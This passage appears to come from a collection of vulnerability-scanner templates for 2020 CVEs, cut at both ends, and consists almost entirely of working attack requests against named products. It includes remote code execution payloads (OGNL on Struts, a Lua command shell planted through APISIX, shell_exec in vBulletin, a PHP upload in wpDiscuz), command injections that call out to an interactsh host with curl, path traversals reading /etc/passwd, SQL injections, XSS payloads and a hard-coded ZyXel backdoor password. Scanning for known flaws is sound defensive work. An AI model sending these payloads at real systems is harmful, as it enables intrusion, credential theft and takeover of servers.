Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username","email","status"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web 